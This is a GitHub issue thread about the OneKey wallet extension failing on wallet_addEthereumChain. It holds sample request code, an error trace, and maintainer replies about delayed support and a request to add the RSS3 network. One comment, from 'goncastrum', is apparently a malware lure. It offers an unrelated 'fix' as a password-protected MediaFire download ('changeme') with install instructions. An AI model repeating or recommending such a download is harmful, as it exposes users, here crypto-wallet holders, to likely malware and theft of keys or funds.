### ISSUE TITLE
[BUG]: wallet_addEthereumChain throws error: Error JSON PRC response: the method wallet_addEthereumChain does not exist/is not available

### ISSUE THREAD

**Issue by songkeys** [OneKeyHQ/app-monorepo#5682]
**Prerequisites**
Please answer the following questions for yourself before submitting an issue. **YOU MAY DELETE THE PREREQUISITES SECTION.**

- [x] I checked to make sure that this issue has not already been filed
- [ ] I've asked for help in the [OneKey Discord](https://discord.com/invite/onekey) before filing this issue.

**Describe the bug**

`wallet_addEthereumChain` does not seem to work any more.

Example code:

```js
  window.ethereum.request({
      method: 'wallet_addEthereumChain',
      params: [{
        chainId: '0x64',
        chainName: 'Gnosis Chain',
        nativeCurrency: {
          name: 'xDAI',
          symbol: 'xDAI',
          decimals: 18
        },
        rpcUrls: ['https://rpc.gnosischain.com/'],
        blockExplorerUrls: ['https://gnosisscan.io/']
      }]
    });
```

Error:

```
{
    "name": "Error",
    "message": "Error JSON PRC response: the method wallet_addEthereumChain does not exist/is not available",
    "stack": "Error: Error JSON PRC response: the method wallet_addEthereumChain does not exist/is not available\n    at parseRPCResponse (chrome-extension://jnmbobjmhlngoefaiojfljckilhhlhcj/background.bundle.js:8:3585179)\n    at chrome-extension://jnmbobjmhlngoefaiojfljckilhhlhcj/background.bundle.js:8:1453930\n    at Array.map (<anonymous>)\n    at ServiceDApp.<anonymous> (chrome-extension://jnmbobjmhlngoefaiojfljckilhhlhcj/background.bundle.js:8:1453890)\n    at Generator.next (<anonymous>)\n    at asyncGeneratorStep (chrome-extension://jnmbobjmhlngoefaiojfljckilhhlhcj/background.bundle.js:8:11373261)\n    at _next (chrome-extension://jnmbobjmhlngoefaiojfljckilhhlhcj/background.bundle.js:8:11373506)"
}
```

**To Reproduce**
Go to console and execute the above code or [the sample code in your repo](https://github.com/OneKeyHQ/test-dapp/blob/843c891524b90b9f3ce777cf3c948760b5090747/src/index.js#L287-L298).

**Expected behavior**
This will prompt the "Add chain to wallet" window to appear.

**Screenshots**
The video below demonstrates me: 1) successfully using the same code to bring up Rainbow Wallet; 2) attempting to use the same code but failing to bring up OneKey Wallet.

https://github.com/user-attachments/assets/8f571764-bc6b-4dbb-b53a-9c7530f551c9

**Desktop (please complete the following information):**
 - OS: macOS
 - Browser: arc
 - Version: latest

**Additional context**
I have just tested the Chrome extension. Some users are reporting that they are unable to do the same in the app too.

---

edit: I was trying to make a PR to fix this but found [this endpoint](https://github.com/OneKeyHQ/app-monorepo/blob/a95239e597e2fffeb4dc342e1384b6ba568ead41/packages/kit-bg/src/services/ServiceDApp.ts#L936)  is not open source? Btw, you should definitely fix the disturbing `PRC` typo.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ByteZhang1024** [comment]
There are no plans to support wallet_addEthereumChain in the near future.

**Comment by songkeys** [comment]
Is there a public announcement available regarding this decision? Without it, users could become confused and our dapp developers might face inconvenience and queries from users. 

By the way, I came across a tweet from the official Onekey account mentioning that it will be addressed in the upcoming version. Which statement is accurate? https://x.com/OneKeyCN/status/1829383704923496802

**Comment by ByteZhang1024** [comment]
We will do it, but not that quickly. This adjustment is a very significant change.
You can first explain your requirements and which networks you need. We can initially embed them in the app.

**Comment by songkeys** [comment]
I see.

I am a developer from @rss3-network. Our users are experiencing issues connecting to our chain using OneKey while they reported they could do so a while ago. If possible, could you kindly embed the `rss3` chain in the app? Thank you!

You can find the chain config here: 
- mainnet:https://github.com/wevm/viem/blob/main/src/chains/definitions/rss3.ts
- testnet: https://github.com/wevm/viem/blob/main/src/chains/definitions/rss3Sepolia.ts

**Comment by ByteZhang1024** [comment]
If you need to transfer any assets, you can use https://app.onekey.so/ for now.
The requirement has been reported, and we will process the addition of the RSS3 network as soon as possible.

**Comment by iavl** [comment]
> If you need to transfer any assets, you can use https://app.onekey.so/ for now. The requirement has been reported, and we will process the addition of the RSS3 network as soon as possible.

May I ask when onekey wallet plans to support the RSS3 VSL network?
